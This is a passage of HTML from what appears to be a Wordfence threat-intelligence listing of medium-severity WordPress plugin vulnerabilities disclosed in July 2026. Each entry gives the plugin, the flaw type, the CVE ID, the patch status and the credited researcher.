<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/celvex-group" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1d97ecd82c6b11bb69844b705d48253b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1d97ecd82c6b11bb69844b705d48253b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/celvex-group" target="_blank" rel="noopener">Celvex Group</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/67ff1f6e-0bea-4e09-ac3d-727d13fcbfa1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/186b9f06-e637-4f04-a3c3-13ec8496402c" target="_blank" rel="noopener">Mediavine Control Panel &lt;= 2.10.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-25424" target="_blank" rel="noopener noreferrer">							CVE-2026-25424						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-control-panel" target="_blank" rel="noopener">Mediavine Control Panel</a> <span class="wfvr-software-slug">[mediavine-control-panel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/186b9f06-e637-4f04-a3c3-13ec8496402c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85550779-fd46-4130-92f1-b291d4e86b21" target="_blank" rel="noopener">Nexter Blocks &lt;= 5.0.0 &#8211; Authenticated (Subscriber+) Path Traversal to Arbitrary CSS/JS File Deletion via &#8216;plus_name&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15420" target="_blank" rel="noopener noreferrer">							CVE-2026-15420						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-plus-addons-for-block-editor" target="_blank" rel="noopener">Nexter Blocks – Gutenberg Blocks, Page Builder &amp; AI Website Builder</a> <span class="wfvr-software-slug">[the-plus-addons-for-block-editor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85550779-fd46-4130-92f1-b291d4e86b21" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e94d308-8d36-487e-be72-e1599c4384f9" target="_blank" rel="noopener">Paid Membership Subscriptions – Effortless Memberships, Recurring Payments &amp; Content Restriction &lt;= 3.0.7 &#8211; Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59539" target="_blank" rel="noopener noreferrer">							CVE-2026-59539						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-member-subscriptions" target="_blank" rel="noopener">Paid Membership Subscriptions – Effortless Memberships, Recurring Payments &amp; Content Restriction</a> <span class="wfvr-software-slug">[paid-member-subscriptions]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e94d308-8d36-487e-be72-e1599c4384f9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ceb3ec6d-9960-441c-82ca-3cba9da77495" target="_blank" rel="noopener">Participants Database &lt;= 2.7.8.4 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27423" target="_blank" rel="noopener noreferrer">							CVE-2026-27423						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/participants-database" target="_blank" rel="noopener">Participants Database</a> <span class="wfvr-software-slug">[participants-database]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ceb3ec6d-9960-441c-82ca-3cba9da77495" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64bd14de-a201-4532-b980-962feab0d69b" target="_blank" rel="noopener">Polylang &lt;= 3.8.5 &#8211; Authenticated (Contributor+) Sensitive Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65458" target="_blank" rel="noopener noreferrer">							CVE-2026-65458						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/polylang" target="_blank" rel="noopener">Polylang</a> <span class="wfvr-software-slug">[polylang]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64bd14de-a201-4532-b980-962feab0d69b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5890360b-e0ef-4ec2-8117-1b4004573e93" target="_blank" rel="noopener">Popup for CF7 with Sweet Alert &lt;= 1.6.5 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65540" target="_blank" rel="noopener noreferrer">							CVE-2026-65540						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-sweet-alert-popup" target="_blank" rel="noopener">Popup for CF7 with Sweet Alert</a> <span class="wfvr-software-slug">[cf7-sweet-alert-popup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6354b317fcf2c6bde1d3a0b7e8bd25f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6354b317fcf2c6bde1d3a0b7e8bd25f0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener">testoun</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5890360b-e0ef-4ec2-8117-1b4004573e93" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49275353-4f8a-4110-aaa1-1c7612fa3ce5" target="_blank" rel="noopener">Product Slider, Product Grid, Product Masonry &lt;= 1.13.62 &#8211; Authenticated (Contributor+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65456" target="_blank" rel="noopener noreferrer">							CVE-2026-65456						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-slider" target="_blank" rel="noopener">Product Slider, Product Grid, Product Masonry</a> <span class="wfvr-software-slug">[woocommerce-products-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49275353-4f8a-4110-aaa1-1c7612fa3ce5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2277e9d3-9589-42a7-9649-50afbf20a94a" target="_blank" rel="noopener">Query Wrangler &lt;= 1.5.57 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65491" target="_blank" rel="noopener noreferrer">							CVE-2026-65491						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/query-wrangler" target="_blank" rel="noopener">Query Wrangler</a> <span class="wfvr-software-slug">[query-wrangler]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e80ce9dc8cd55ea122ada90f882b7d82.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e80ce9dc8cd55ea122ada90f882b7d82"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/que-thanh-tuan-2" target="_blank" rel="noopener">Que Thanh Tuan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2277e9d3-9589-42a7-9649-50afbf20a94a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83aa1e83-45ff-4aa5-9c06-f79bdc3bf6c0" target="_blank" rel="noopener">QuickCal &lt;= 1.0.16 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-27377" target="_blank" rel="noopener noreferrer">							CVE-2026-27377						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quickcal" target="_blank" rel="noopener">QuickCal</a> <span class="wfvr-software-slug">[quickcal]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83aa1e83-45ff-4aa5-9c06-f79bdc3bf6c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3bc547f7-4f9e-4633-b881-107473dc980e" target="_blank" rel="noopener">Reviewer &lt;= 3.14.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65479" target="_blank" rel="noopener noreferrer">							CVE-2026-65479						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/reviewer" target="_blank" rel="noopener">reviewer</a> <span class="wfvr-software-slug">[reviewer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3bc547f7-4f9e-4633-b881-107473dc980e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba3d59a1-d0f6-4fe8-bf79-35b35b2a2fee" target="_blank" rel="noopener">ShipTime: Discount Shipping &lt;= 1.1.1 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59528" target="_blank" rel="noopener noreferrer">							CVE-2026-59528						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shiptime-discount-shipping" target="_blank" rel="noopener">ShipTime: Discount Shipping</a> <span class="wfvr-software-slug">[shiptime-discount-shipping]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vunbt" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/481fa218340879c2506f5e4884abc1f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="481fa218340879c2506f5e4884abc1f0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vunbt" target="_blank" rel="noopener">VuNBT</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ba3d59a1-d0f6-4fe8-bf79-35b35b2a2fee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33f5a513-bc98-4beb-bec2-72eba8bd783d" target="_blank" rel="noopener">Style Kits &lt;= 2.6.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65484" target="_blank" rel="noopener noreferrer">							CVE-2026-65484						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/analogwp-templates" target="_blank" rel="noopener">Style Kits for Elementor</a> <span class="wfvr-software-slug">[analogwp-templates]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao" target="_blank" rel="noopener">Bao &#8211; BlueRock</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/33f5a513-bc98-4beb-bec2-72eba8bd783d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5007a9a9-faf6-493c-8adb-7260c8089bb2" target="_blank" rel="noopener">Sunshine Photo Cart – Client Photo Gallery &amp; Photo Proofing for Photographers &lt;= 3.6.10.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57703" target="_blank" rel="noopener noreferrer">							CVE-2026-57703						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sunshine-photo-cart" target="_blank" rel="noopener">Sunshine Photo Cart – Client Photo Gallery &amp; Photo Proofing for Photographers</a> <span class="wfvr-software-slug">[sunshine-photo-cart]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5007a9a9-faf6-493c-8adb-7260c8089bb2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c04449a1-24ac-4dca-932b-fc8c62b53ce6" target="_blank" rel="noopener">TemplateSpare – 1000+ WordPress Starter Templates &amp; Full Site Migration Tool | 1-Click Import/Export &amp; No-Code Builder &lt;= 4.2.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65530" target="_blank" rel="noopener noreferrer">							CVE-2026-65530						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/templatespare" target="_blank" rel="noopener">TemplateSpare – 1000+ WordPress Starter Templates &amp; Full Site Migration Tool | 1-Click Import/Export &amp; No-Code Builder</a> <span class="wfvr-software-slug">[templatespare]</span></div>
</p></div>
